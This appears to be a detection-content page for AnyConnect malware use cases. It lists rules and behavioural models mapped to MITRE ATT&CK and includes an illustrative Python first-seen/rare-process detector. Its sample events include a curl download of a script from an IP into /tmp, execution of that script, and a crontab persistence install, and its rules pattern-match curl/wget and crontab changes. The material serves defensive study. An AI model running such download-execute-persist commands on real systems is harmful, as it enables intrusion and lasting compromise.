Product: AnyConnect
Use-Case: Malware
Rules | Models | MITRE ATT&CK® TTPs | Activity Types | Parsers |
---|---|---|---|---|
25 | 6 | 8 | 2 | 2 |
Rules, grouped by MITRE ATT&CK® TTP:

Event Type | MITRE ATT&CK® TTP | Rule | Description |
---|---|---|---|
process-network | T1053 - Scheduled Task/Job; T1053.003 - Scheduled Task/Job: Cron | A-EPA-HP-CrontabMod-F | First execution of process on asset and the command of the process is a crontab modification |
process-network | T1053 - Scheduled Task/Job; T1053.003 - Scheduled Task/Job: Cron | A-EPA-HP-CrontabMod-A | Abnormal execution of process on asset and the command of the process is a crontab modification |
process-network | TA0002 - Execution | EPA-UH-Pen-F | Known pentest tool used |
process-network | TA0002 - Execution | A-EPA-HP-F | First execution of process on asset |
process-network | TA0002 - Execution | A-EPA-HP-A | Abnormal execution of process on asset |
process-network | TA0002 - Execution | A-EPA-ZP-F | First execution of process for the asset in this zone |
process-network | TA0002 - Execution | A-EPA-ZP-A | Abnormal execution of process for the asset in this zone |
process-network | TA0002 - Execution | A-EPA-OP-F | First execution of process for the asset in this organization |
process-network | TA0002 - Execution | A-EPA-OP-A | Abnormal execution of process for the asset in this organization |
process-network | TA0002 - Execution | A-EPA-HPP-F | First parent-process combination on asset |
process-network | TA0002 - Execution | A-EPA-HPP-A | Abnormal parent-process combination on asset |
process-network | TA0002 - Execution | A-EPA-OPP-F | First parent-process combination in this organization |
process-network | TA0002 - Execution | A-EPA-OPP-A | Abnormal parent-process combination in this organization |
process-network | TA0002 - Execution | A-EPA-TEMP-DIRECTORY-F | First execution of this process from a temporary directory on this asset |
process-network | TA0002 - Execution | A-EPA-TEMP-DIRECTORY-A | Abnormal execution of this process from a temporary directory |
process-network | TA0002 - Execution | A-EPA-HP-Commands-F | First execution of process on asset and the command of the process is curl/wget |
process-network | TA0002 - Execution | A-EPA-HP-Commands-A | Abnormal execution of process on asset and the command of the process is curl/wget |
process-network | T1568 - Dynamic Resolution; T1568.002 - Dynamic Resolution: Domain Generation Algorithms | EPA-UD-DGA-F | First network access to this domain, which has been identified as DGA-generated |
process-network | T1568 - Dynamic Resolution; T1568.002 - Dynamic Resolution: Domain Generation Algorithms | EPA-UD-DGA-A | Abnormal network access to this domain, which has been identified as DGA-generated |
process-network | T1568 - Dynamic Resolution; T1568.002 - Dynamic Resolution: Domain Generation Algorithms | EPA-UD-DGA-N | Common network access to this domain, which has been identified as DGA-generated |
process-network | TA0010 - Exfiltration; TA0011 - Command and Control | EPA-PI-ThreatIp | Process has created a connection to a bad-reputation IP address |
process-network | TA0011 - Command and Control | A-NET-TI-H-Outbound | Outbound connection to a known malicious host |
process-network | TA0011 - Command and Control | A-NET-TI-IP-Inbound | Inbound connection from a known malicious IP |
process-network | TA0011 - Command and Control | A-NET-TI-H-Inbound | Inbound connection from a known malicious host |
vpn-login | T1078 - Valid Accounts | Auth-Blacklist-Shost | User authentication or login from a known blacklisted IP |

Models (the behavioral baselines the F/A/N rules above score against):

Event Type | Model | Description |
---|---|---|
process-network | A-EPA-UP-TEMP | Processes executed from TEMP directories on this asset |
process-network | A-EPA-OPP | Parent-process combinations in the organization |
process-network | A-EPA-HPP | Parent-process combinations per host on this asset |
process-network | A-EPA-ZP | Processes executed in this asset's zone |
process-network | EPA-UH-Pen | Malicious tools used by user |
process-network | EPA-UD-DGA | Top web domains that appear to be DGA-generated for this user |
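The rule names above follow one pattern: a behavioral model (process per host, process per zone, parent-process pair, and so on) yields an "F" (first seen) or "A" (abnormal, i.e. rare) verdict, and some rules additionally gate on a property of the command line (crontab modification, curl/wget, execution from a temp directory). The block below is an added illustration of that pattern, written for this page and not Exabeam's code: it runs a simplified first-seen/rare scorer over constructed process events and emits alerts labeled with the rule names from the table. The learning period (`min_history`), rarity threshold (`rare_ratio`), the sample events, and the decision to give each command-gated rule its own baseline are all assumptions made here, not documented product behavior.

```python
import os
from collections import Counter, defaultdict

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOAD_TOOLS = {"curl", "wget"}


def is_crontab_modification(cmd):
    """True for crontab invocations that install, edit or remove a table.

    `crontab -l` only lists; -e, -r, a file argument, or no argument at all
    (which reads a new table from stdin) all change persistence.
    """
    tokens = cmd.split()
    if not tokens or os.path.basename(tokens[0]) != "crontab":
        return False
    args = tokens[1:]
    if "-l" in args:
        return False
    return not args or any(a in ("-e", "-r", "-") or not a.startswith("-") for a in args)


class Baseline:
    """Per-rule, per-entity frequency counts standing in for the table's models.

    score() returns "F" for a value never seen for that rule/entity, "A" for a
    value seen in fewer than `rare_ratio` of the entity's events, and None while
    the entity has fewer than `min_history` events (learning period).
    Simplified stand-in written for this example; not Exabeam's scoring.
    """

    def __init__(self, min_history=20, rare_ratio=0.05):  # thresholds are assumptions
        self.min_history = min_history
        self.rare_ratio = rare_ratio
        self.seen = defaultdict(Counter)  # (rule, entity) -> value -> count
        self.history = Counter()          # entity -> events observed so far

    def score(self, rule, entity, value):
        total = self.history[entity]
        if total < self.min_history:
            return None
        count = self.seen[(rule, entity)][value]
        if count == 0:
            return "F"
        if count / total < self.rare_ratio:
            return "A"
        return None

    def observe(self, rule, entity, value):
        self.seen[(rule, entity)][value] += 1


# (rule prefix from the table, entity kind, baselined feature, gating feature)
RULES = [
    ("A-EPA-HP",             "host", "proc", None),
    ("A-EPA-ZP",             "zone", "proc", None),
    ("A-EPA-HPP",            "host", "pair", None),
    ("A-EPA-TEMP-DIRECTORY", "host", "proc", "temp"),
    ("A-EPA-HP-CrontabMod",  "host", "proc", "cron_mod"),
    ("A-EPA-HP-Commands",    "host", "proc", "download"),
]


def features(event):
    proc = os.path.basename(event["path"])
    return {
        "proc": proc,
        "pair": f'{event["parent"]}>{proc}',
        "temp": event["path"].startswith(TEMP_DIRS),
        "cron_mod": is_crontab_modification(event["cmd"]),
        "download": proc in DOWNLOAD_TOOLS,
    }


def detect(events, baseline=None):
    """Score events in time order; return (rule-verdict, host, cmd) alerts.

    Each event is scored before it is added to history so it cannot explain
    itself away. Gated rules only observe events that satisfy their gate, so
    benign `crontab -l` history does not vouch for `crontab <file>`.
    """
    if baseline is None:
        baseline = Baseline()
    alerts = []
    for event in events:
        f = features(event)
        for rule, kind, value_key, gate in RULES:
            if gate and not f[gate]:
                continue
            entity = (kind, event[kind])
            verdict = baseline.score(rule, entity, f[value_key])
            if verdict:
                alerts.append((f"{rule}-{verdict}", event["host"], event["cmd"]))
            baseline.observe(rule, entity, f[value_key])
        baseline.history[("host", event["host"])] += 1
        baseline.history[("zone", event["zone"])] += 1
    return alerts


def _ev(parent, path, cmd, host="ws01", zone="corp"):
    return {"host": host, "zone": zone, "parent": parent, "path": path, "cmd": cmd}


# Constructed sample events (not real telemetry), in time order.
SAMPLE_EVENTS = (
    # 20 routine events that fill the learning period
    [_ev("sshd", "/usr/bin/bash", "bash -l")] * 8
    + [_ev("bash", "/usr/bin/ls", "ls -la")] * 6
    + [_ev("bash", "/usr/bin/python3", "python3 -V")]
    + [_ev("bash", "/usr/bin/crontab", "crontab -l")] * 5
    # 20 more routine events after learning: nothing should fire
    + [_ev("bash", "/usr/bin/ls", "ls -la")] * 20
    # download, run from /tmp, persist via cron, then a rarely seen process
    + [
        _ev("bash", "/usr/bin/curl", "curl -s http://198.51.100.7/p.sh -o /tmp/p.sh"),
        _ev("bash", "/tmp/p.sh", "/tmp/p.sh"),
        _ev("p.sh", "/usr/bin/crontab", "crontab /tmp/.cron"),
        _ev("bash", "/usr/bin/python3", "python3 -m http.server 8080"),
        _ev("bash", "/usr/bin/crontab", "crontab -l"),
    ]
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two points worth noting when reading the output. The `crontab /tmp/.cron` event does not trigger `A-EPA-HP-F`, because `crontab` was already seen on the host during the learning period; it is caught by `A-EPA-HP-CrontabMod-F` (own baseline, gated on the modifying command) and by `A-EPA-HPP-F` (the `p.sh>crontab` parent pair). This is the practical reason the table carries command-gated rules alongside the plain first-execution ones: a process name alone is a weak key once any benign use of the tool has been observed.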